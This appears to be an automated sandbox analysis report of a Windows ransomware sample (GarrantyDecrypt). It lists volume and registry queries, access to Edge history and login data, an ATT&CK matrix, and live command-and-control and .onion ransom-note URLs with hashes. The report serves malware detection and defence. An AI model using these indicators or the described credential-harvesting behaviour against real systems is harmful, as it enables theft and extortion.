Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Queries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	3 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	1 Taint Shared Content	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	2 Data Encrypted for Impact
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Bootkit	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	Logon Script (Windows)	1 Bootkit	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Proxy	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2b7cu0KwZl.exe	47%	ReversingLabs	Win64.Ransomware.GarrantyDecrypt

Source	Detection	Scanner	Label
http://api.ipify.orgunknown------------------------multipart/form-data;	0%	Avira URL Cloud	safe
http://193.143.1.139:80/Ujdu8jjooue/biweax.php	0%	Avira URL Cloud	safe
http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO	0%	Avira URL Cloud	safe
http://193.143.1.139/	0%	Avira URL Cloud	safe
http://193.143.1.139/Ujdu8jjooue/biweax.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	172.67.74.152	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	2b7cu0KwZl.exe, 00000000.00000003.1722957334.0000020C95377000.00000004.00000020.00020000.00000000.sdmp	false		high
http://193.143.1.139/Ujdu8jjooue/biweax.php	2b7cu0KwZl.exe	false	Avira URL Cloud: safe	unknown
http://api.ipify.orgunknown------------------------multipart/form-data;	2b7cu0KwZl.exe	false	Avira URL Cloud: safe	unknown
http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO	RECOVERY INFO.txt62.0.dr, RECOVERY INFO.txt283.0.dr, RECOVERY INFO.txt37.0.dr, RECOVERY INFO.txt10.0.dr, RECOVERY INFO.txt196.0.dr, RECOVERY INFO.txt153.0.dr, RECOVERY INFO.txt89.0.dr, RECOVERY INFO.txt257.0.dr, RECOVERY INFO.txt155.0.dr, RECOVERY INFO.txt56.0.dr, RECOVERY INFO.txt52.0.dr, RECOVERY INFO.txt275.0.dr, RECOVERY INFO.txt115.0.dr, RECOVERY INFO.txt253.0.dr, RECOVERY INFO.txt106.0.dr, RECOVERY INFO.txt17.0.dr, RECOVERY INFO.txt111.0.dr, RECOVERY INFO.txt46.0.dr, RECOVERY INFO.txt66.0.dr, RECOVERY INFO.txt42.0.dr, RECOVERY INFO.txt135.0.dr	true	Avira URL Cloud: safe	unknown
http://193.143.1.139:80/Ujdu8jjooue/biweax.php	2b7cu0KwZl.exe, 00000000.00000003.1758533102.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1765030142.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1768568277.0000020C953A8000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1757356372.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1755290700.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1753108861.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754875502.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754157902.0000020C953AA000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1765854634.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1755669885.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1769480071.0000020C9539E000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754084381.0000020C953A2000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1750931995.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1752256128.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1767524988.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1751988486.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754335044.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://193.143.1.139/	2b7cu0KwZl.exe, 00000000.00000003.1758533102.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1757356372.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1755290700.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1753108861.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754875502.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754157902.0000020C953AA000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1755669885.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754084381.0000020C953A2000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1750931995.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1752256128.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1751988486.0000020C953A9000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1754335044.0000020C953AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.ipify.org	2b7cu0KwZl.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.143.1.139	unknown	unknown		57271	BITWEB-ASRU	false
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1548500
Start date and time:	2024-11-04 15:29:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2b7cu0KwZl.exe renamed because original name is a hash value
Original Sample Name:	e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde.exe
Detection:	MAL
Classification:	mal84.rans.spre.spyw.evad.winEXE@1/1313@1/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeleteValueKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtSetValueKey calls found.
Report size getting too big, too many NtWriteFile calls found.
VT rate limit hit for: 2b7cu0KwZl.exe

Simulations

Behavior and APIs

Time	Type	Description
09:31:39	API Interceptor	149x Sleep call for process: 2b7cu0KwZl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.143.1.139	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	193.143.1.139/Ujdu8jjooue/biweax.php
172.67.74.152	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	api.ipify.org/
	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	172.67.74.152
	Payslip_October_2024_pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Copia de pago de la Orden de compra OI16014 y OI16015.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Payslip_October_2024_pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	V7FWuG5Lct.exe	Get hash	malicious	Quasar	Browse	172.67.74.152
	7ll96oOSBF.exe	Get hash	malicious	Quasar	Browse	104.26.12.205
	Payload 94.75 (4).225.exe	Get hash	malicious	Kronos, Strela Stealer	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BITWEB-ASRU	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	193.143.1.139
	https://caraccidentdefencelawyer.com/LBKQgs7C#3l3f816z5y810bbd3w5muypm6py7liz04w39	Get hash	malicious	GRQ Scam	Browse	193.143.1.195
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	IWnUKXop2x.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	LNLAncf2v5.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	193.143.1.59
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	https://r.mailing.campingcarpark.com/tr/cl/m2JPJkzPDbfL5s2bDabtlPRATYRQylIubPPupv_vc3kDzIWW2_TNYLb8YBmBuxxUamsx-FMq6iQDKP4aBiozKtmctIWJHvB_jMPMQCy2V9w9n7PdBiSom_VscfyxjRbqNIYqjqLTOUl5-9LarkHqAVm5L2wSo2oXxGVlFSK9ch7-9o3rO6zfaWOVTBYD4bj-cBh9D46nF7VLeW5JX646w9BMjGtwIbaonCu5pf0X8ov7yR1QFDHFtwW10C7XEoZag-1kPqsvroBYGdEMlwciu7AuBU1Y26NjgdB1vb4QnVOsIs_acQZJzGs0n3fybIY3bzcEJyP_Oy1jYqrav3I9lVVIjNjH0id0gdS4TbucLqy31-2RoRtZQc8bVuUs9GXZATyHwjK94EM9fKm3gaQ0u6Km4OhvabjJRJ1r26CvdUmHO1SK4HumQKUTUp8TXSmV-Stnpm_CGVl-UuJ0NvRq2I4Xw9uT__o0aJIGY71Xtr5Z7Y_et8YZZEgYR8N-C3PmDstWGdA9-IDO6X1D8sJVLEuj4ynD4q9-hO3nCsqHsDxKxs0cmE6rNpf8r-UvD1nXZ_a-VWCTi1NHu4b8MXaBheK-JZ2q5hHvkeAVzUdiXCOufUWyY-Ee97OlTdt1Y3IjIn0dj-CvUR17EtHIzPpKzFbJHJuSBA7gKlgbAXP5qj9Z9DYOs3fd4_dxBHDc4hFtPyERTdDEp75X34mcet-FOG2cCg6GELttByElL4HvrmfIJOs_BaLRaeRpYLsj2tIjMzr0T4OVWHBOW-Q1-iqoT_zCsmcuYUhzpgTIqTGpvB7QFG0i3ZF3aeteqWLx1NAZYNeYfLSsmOWLZWMqQuWpJNh5nxTAhUC-Ine_ExnFOYwfU5uvTSRkQ3WnzaJTik6lH8zjYuRq0R9zqImSml6gks4xbe9VZFCW-qtDzZihL-bjo2pnAM-z6PAC_JoDVrKTvQZZFhm5dMQTMyyNpmiJG_1gQ1xJxfcTrHmgDYLf	Get hash	malicious	HTMLPhisher	Browse	172.64.148.115
	http://r.srvtrck.com/v1/redirect?url=http://www.ritual.com&api_key=2787b73d6d1c026b48687320e239182a&site_id=e5c21d0795544b439bdb70bae77167c9&type=url&yk_tag=973511c5431487e8a29276d8e592449d	Get hash	malicious	Unknown	Browse	104.19.229.21
	Purchase order.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	172.67.74.152
	Quote_General_Tech_LLC_637673,PDF.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.5.155
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	jCN22OTVxq.lnk	Get hash	malicious	Unknown	Browse	104.21.73.244

Process:	C:\Users\user\Desktop\2b7cu0KwZl.exe
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	5.745689858203985
Encrypted:	false
SSDEEP:	3:D8PElw+u/3ll/lsltlaRS7uUgfsomxxM6x65rCOWV0DTxO1JnHvn:DBw+u6wS7uUg0fXMzIreDVq5n
MD5:	CCE70C6BEB51BAAE21FA821E8F414478
SHA1:	AC2FC7D78665F9E03C6766D26F2C4C820DB6223A
SHA-256:	A8528417719A938FA4F4800D6F965D969947C5E86E44015E9C13AEE70B711014
SHA-512:	1EFDE29D1175F34E01C482C5B4B163E04F738A95811E8C8D9E24F11EDB290E69C5C70E42E2AA86A7D7BA1018319F45A62BA44416AA30D853BC2C7933BC8CF50A
Malicious:	false
Reputation:	low
Preview:	...Y*!@..!2A........(...........................F7...:\...\|51Y...2.5..+s..mT.b~.i.....py?....b\:Frg.?G.w.....Q.2.j...l.pe...,....o..h.4rD3$.

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.4272263274140755
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	2b7cu0KwZl.exe
File size:	726'016 bytes
MD5:	0d7e80ec85db5cb45642235cb2381a0c
SHA1:	f0a15a7ecaff7d0659bab2a416e5d668ff67724e
SHA256:	e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde
SHA512:	bb54a37b50b26b33724462faaf5d8d6328721a980bb51a95cfffce048d1ccca4050ee0a3740f47604de6504de70026c5f1567efe8be3913cea2ef9f1012a8921
SSDEEP:	12288:klXYLQe1BJTAhHvVIgLfnEYbLrOqP0NbuLyoHNAoBmbgLO:klip10hREYbLrBWbuLod
TLSH:	BBF48D26B7AC01F8E0B7D139C9464516F7F2B84A236187DF03A147AA5F276E45E3E321
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....o.g...............)............L:.........@.....................................-....`................................

Entrypoint:	0x140053a4c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x671F6FE1 [Mon Oct 28 11:05:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	88c2ebb7280c5627ea5c203cde572357

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa73b4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbb000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xb5000	0x56c4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbc000	0x1078	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9a9f0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x9ac00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9a8b0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x83000	0x5e8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x81ba0	0x81c00	761df415b612f4c29aa6ccd0f97ffc61	False	0.47046039559248554	data	6.47166308919593	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x83000	0x25872	0x25a00	e9a04a140fab68a09ad318f3b246d515	False	0.43398307724252494	OpenPGP Secret Key	5.373035821089337	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa9000	0xb43c	0x2e00	67bf567798d3b66a7d5492f33568c38c	False	0.15743885869565216	DIY-Thermocam raw data (Lepton 2.x), scale -24371-2112, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 13712.311523	4.024101981093241	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0xb5000	0x56c4	0x5800	fd4920488f7d5331a3cece0172b6ac8a	False	0.4782936789772727	PEX Binary Archive	5.839360561248483	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xbb000	0x1e0	0x200	485e8ed8b860706f5089de5f4f806a30	False	0.53125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbc000	0x1078	0x1200	67a030f47a5626f12858cae5a511c3eb	False	0.3982204861111111	data	5.271003264193856	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

DLL	Import
bcrypt.dll	BCryptGenRandom
SHLWAPI.dll	SHDeleteKeyW, wnsprintfW, PathFileExistsW, wnsprintfA
